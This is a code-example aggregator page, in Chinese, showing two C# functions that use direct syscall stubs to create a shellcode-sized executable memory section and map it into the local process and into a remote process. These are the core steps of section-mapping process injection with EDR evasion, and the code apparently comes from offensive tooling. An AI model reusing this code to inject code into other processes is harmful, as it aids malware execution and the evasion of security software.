C# (CSharp) NtMapViewOfSection示例

编程语言: C# (CSharp)

hotexamples.com的示例: 2

C# (CSharp) NtMapViewOfSection - 已找到2个示例。这些是从开源项目中提取的最受好评的NtMapViewOfSection现实C# (CSharp)示例。您可以评价示例，以帮助我们提高示例质量。

示例#1

显示文件

        public static SECT_DATA MapRemoteSection(IntPtr hProc, IntPtr hSection, long ScSize)
        {
            SECT_DATA SectData = new SECT_DATA();

            IntPtr pScBase    = IntPtr.Zero;
            long   lSecOffset = 0;
            long   MaxSize    = ScSize;

            IntPtr             pSysCall = Generic.GetSyscallStub("NtMapViewOfSection");
            NtMapViewOfSection fSyscallNtMapViewOfSection = (NtMapViewOfSection)Marshal.GetDelegateForFunctionPointer(pSysCall, typeof(NtMapViewOfSection));
            UInt32             CallResult = fSyscallNtMapViewOfSection(hSection, hProc, ref pScBase, IntPtr.Zero, IntPtr.Zero, ref lSecOffset, ref MaxSize, 0x2, 0, 0x20);

            if (CallResult == 0 && pScBase != IntPtr.Zero)
            {
                Console.WriteLine("    |-> pRemoteBase: 0x" + String.Format("{0:X}", (pScBase).ToInt64()));
                SectData.pBase = pScBase;
            }
            else
            {
                Console.WriteLine("[!] Failed to map section in remote process..");
                SectData.isvalid = false;
                return(SectData);
            }

            SectData.isvalid = true;
            return(SectData);
        }

示例#2

显示文件

        public static SECT_DATA MapLocalSection(long ScSize)
        {
            SECT_DATA SectData = new SECT_DATA();

            long   MaxSize  = ScSize;
            IntPtr hSection = IntPtr.Zero;

            IntPtr          pSysCall = Generic.GetSyscallStub("NtCreateSection");
            NtCreateSection fSyscallNtCreateSection = (NtCreateSection)Marshal.GetDelegateForFunctionPointer(pSysCall, typeof(NtCreateSection));
            UInt32          CallResult = fSyscallNtCreateSection(ref hSection, 0xe, IntPtr.Zero, ref MaxSize, 0x40, 0x8000000, IntPtr.Zero);

            if (CallResult == 0 && hSection != IntPtr.Zero)
            {
                Console.WriteLine("    |-> hSection: 0x" + String.Format("{0:X}", (hSection).ToInt64()));
                Console.WriteLine("    |-> Size: " + ScSize);
                SectData.hSection = hSection;
            }
            else
            {
                Console.WriteLine("[!] Failed to create section..");
                SectData.isvalid = false;
                return(SectData);
            }

            IntPtr pScBase    = IntPtr.Zero;
            long   lSecOffset = 0;

            pSysCall = Generic.GetSyscallStub("NtMapViewOfSection");
            NtMapViewOfSection fSyscallNtMapViewOfSection = (NtMapViewOfSection)Marshal.GetDelegateForFunctionPointer(pSysCall, typeof(NtMapViewOfSection));

            CallResult = fSyscallNtMapViewOfSection(hSection, (IntPtr)(-1), ref pScBase, IntPtr.Zero, IntPtr.Zero, ref lSecOffset, ref MaxSize, 0x2, 0, 0x4);
            if (CallResult == 0 && pScBase != IntPtr.Zero)
            {
                Console.WriteLine("    |-> pBase: 0x" + String.Format("{0:X}", (pScBase).ToInt64()));
                SectData.pBase = pScBase;
            }
            else
            {
                Console.WriteLine("[!] Failed to map section locally..");
                SectData.isvalid = false;
                return(SectData);
            }

            SectData.isvalid = true;
            return(SectData);
        }